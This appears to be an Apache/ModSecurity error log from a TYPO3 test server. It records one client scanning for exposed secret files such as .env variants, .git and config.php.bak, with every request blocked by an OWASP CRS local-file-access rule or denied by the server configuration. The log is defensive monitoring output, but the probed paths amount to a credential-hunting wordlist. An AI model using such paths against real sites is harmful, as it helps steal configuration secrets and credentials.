[Sun Jan 18 08:30:47.109119 2026] [:error] [pid 1490423] [client 185.177.72.66:25042] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWyMJz5UUmmifVbk5ArT-AAAAA4"]
[Sun Jan 18 08:30:47.109276 2026] [:error] [pid 1490423] [client 185.177.72.66:25042] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWyMJz5UUmmifVbk5ArT-AAAAA4"]
[Sun Jan 18 08:30:47.109457 2026] [:error] [pid 1490423] [client 185.177.72.66:25042] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWyMJz5UUmmifVbk5ArT-AAAAA4"]
[Sun Jan 18 08:30:47.111787 2026] [authz_core:error] [pid 1490426] [client 185.177.72.66:24976] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Sun Jan 18 08:30:47.159724 2026] [:error] [pid 1490419] [client 185.177.72.66:25048] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFgAAAAo"]
[Sun Jan 18 08:30:47.159936 2026] [:error] [pid 1490419] [client 185.177.72.66:25048] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFgAAAAo"]
[Sun Jan 18 08:30:47.160085 2026] [:error] [pid 1490419] [client 185.177.72.66:25048] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFgAAAAo"]
[Sun Jan 18 08:30:47.209969 2026] [:error] [pid 1488686] [client 185.177.72.66:5604] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWyMJ8sdzFjjXY44eoPo5QAAAAg"]
[Sun Jan 18 08:30:47.210023 2026] [:error] [pid 1488428] [client 185.177.72.66:5638] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.queue"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.queue"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwQAAAAU"]
[Sun Jan 18 08:30:47.210186 2026] [:error] [pid 1488686] [client 185.177.72.66:5604] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWyMJ8sdzFjjXY44eoPo5QAAAAg"]
[Sun Jan 18 08:30:47.210225 2026] [:error] [pid 1488428] [client 185.177.72.66:5638] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.queue"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwQAAAAU"]
[Sun Jan 18 08:30:47.210357 2026] [:error] [pid 1488686] [client 185.177.72.66:5604] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWyMJ8sdzFjjXY44eoPo5QAAAAg"]
[Sun Jan 18 08:30:47.211589 2026] [:error] [pid 1488394] [client 185.177.72.66:5624] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.worker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.worker"] [unique_id "aWyMJ6sS5gpCu1g21rG0YAAAAAI"]
[Sun Jan 18 08:30:47.211769 2026] [:error] [pid 1488394] [client 185.177.72.66:5624] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.worker"] [unique_id "aWyMJ6sS5gpCu1g21rG0YAAAAAI"]
[Sun Jan 18 08:30:47.211904 2026] [:error] [pid 1488394] [client 185.177.72.66:5624] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.worker"] [unique_id "aWyMJ6sS5gpCu1g21rG0YAAAAAI"]
[Sun Jan 18 08:30:47.213364 2026] [:error] [pid 1490426] [client 185.177.72.66:5640] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.cache"] [unique_id "aWyMJ7--SNtJTJfJyMPK-wAAABA"]
[Sun Jan 18 08:30:47.213533 2026] [:error] [pid 1490426] [client 185.177.72.66:5640] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.cache"] [unique_id "aWyMJ7--SNtJTJfJyMPK-wAAABA"]
[Sun Jan 18 08:30:47.213677 2026] [:error] [pid 1490426] [client 185.177.72.66:5640] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.cache"] [unique_id "aWyMJ7--SNtJTJfJyMPK-wAAABA"]
[Sun Jan 18 08:30:47.214068 2026] [:error] [pid 1488428] [client 185.177.72.66:5638] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.queue"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwQAAAAU"]
[Sun Jan 18 08:30:47.283675 2026] [:error] [pid 1490419] [client 185.177.72.66:5694] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /packages/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/packages/api/.env"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFwAAAAo"]
[Sun Jan 18 08:30:47.283894 2026] [:error] [pid 1490419] [client 185.177.72.66:5694] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/packages/api/.env"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFwAAAAo"]
[Sun Jan 18 08:30:47.284048 2026] [:error] [pid 1490419] [client 185.177.72.66:5694] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/packages/api/.env"] [unique_id "aWyMJ-UEoV5KHg2hnSzkFwAAAAo"]
[Sun Jan 18 08:30:47.286877 2026] [:error] [pid 1490420] [client 185.177.72.66:5682] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/web/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQaAAAAAs"]
[Sun Jan 18 08:30:47.287079 2026] [:error] [pid 1490420] [client 185.177.72.66:5682] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/web/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQaAAAAAs"]
[Sun Jan 18 08:30:47.287225 2026] [:error] [pid 1490420] [client 185.177.72.66:5682] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/web/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQaAAAAAs"]
[Sun Jan 18 08:30:47.441168 2026] [authz_core:error] [pid 1490419] [client 185.177.72.66:5776] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 18 08:30:47.442605 2026] [authz_core:error] [pid 1488686] [client 185.177.72.66:5778] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 18 08:30:47.444385 2026] [:error] [pid 1488394] [client 185.177.72.66:5800] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0YgAAAAI"]
[Sun Jan 18 08:30:47.444565 2026] [:error] [pid 1488394] [client 185.177.72.66:5800] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0YgAAAAI"]
[Sun Jan 18 08:30:47.444739 2026] [:error] [pid 1488394] [client 185.177.72.66:5800] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0YgAAAAI"]
[Sun Jan 18 08:30:47.446309 2026] [:error] [pid 1490430] [client 185.177.72.66:5770] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnNwAAABQ"]
[Sun Jan 18 08:30:47.446497 2026] [:error] [pid 1490430] [client 185.177.72.66:5770] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnNwAAABQ"]
[Sun Jan 18 08:30:47.446627 2026] [:error] [pid 1490430] [client 185.177.72.66:5770] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnNwAAABQ"]
[Sun Jan 18 08:30:47.447241 2026] [authz_core:error] [pid 1490423] [client 185.177.72.66:5748] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php.bak
[Sun Jan 18 08:30:47.455666 2026] [:error] [pid 1490427] [client 185.177.72.66:5812] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIgAAABE"]
[Sun Jan 18 08:30:47.455838 2026] [:error] [pid 1490427] [client 185.177.72.66:5812] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIgAAABE"]
[Sun Jan 18 08:30:47.455982 2026] [:error] [pid 1490427] [client 185.177.72.66:5812] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIgAAABE"]
[Sun Jan 18 08:30:47.457462 2026] [:error] [pid 1488428] [client 185.177.72.66:5734] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.deploy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.deploy"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwwAAAAU"]
[Sun Jan 18 08:30:47.457618 2026] [:error] [pid 1488428] [client 185.177.72.66:5734] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.deploy"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwwAAAAU"]
[Sun Jan 18 08:30:47.457759 2026] [:error] [pid 1488428] [client 185.177.72.66:5734] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.deploy"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwwAAAAU"]
[Sun Jan 18 08:30:47.547911 2026] [:error] [pid 1490423] [client 185.177.72.66:5828] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/.env"] [unique_id "aWyMJz5UUmmifVbk5ArT-wAAAA4"]
[Sun Jan 18 08:30:47.548140 2026] [:error] [pid 1490423] [client 185.177.72.66:5828] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/.env"] [unique_id "aWyMJz5UUmmifVbk5ArT-wAAAA4"]
[Sun Jan 18 08:30:47.548342 2026] [:error] [pid 1490423] [client 185.177.72.66:5828] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/.env"] [unique_id "aWyMJz5UUmmifVbk5ArT-wAAAA4"]
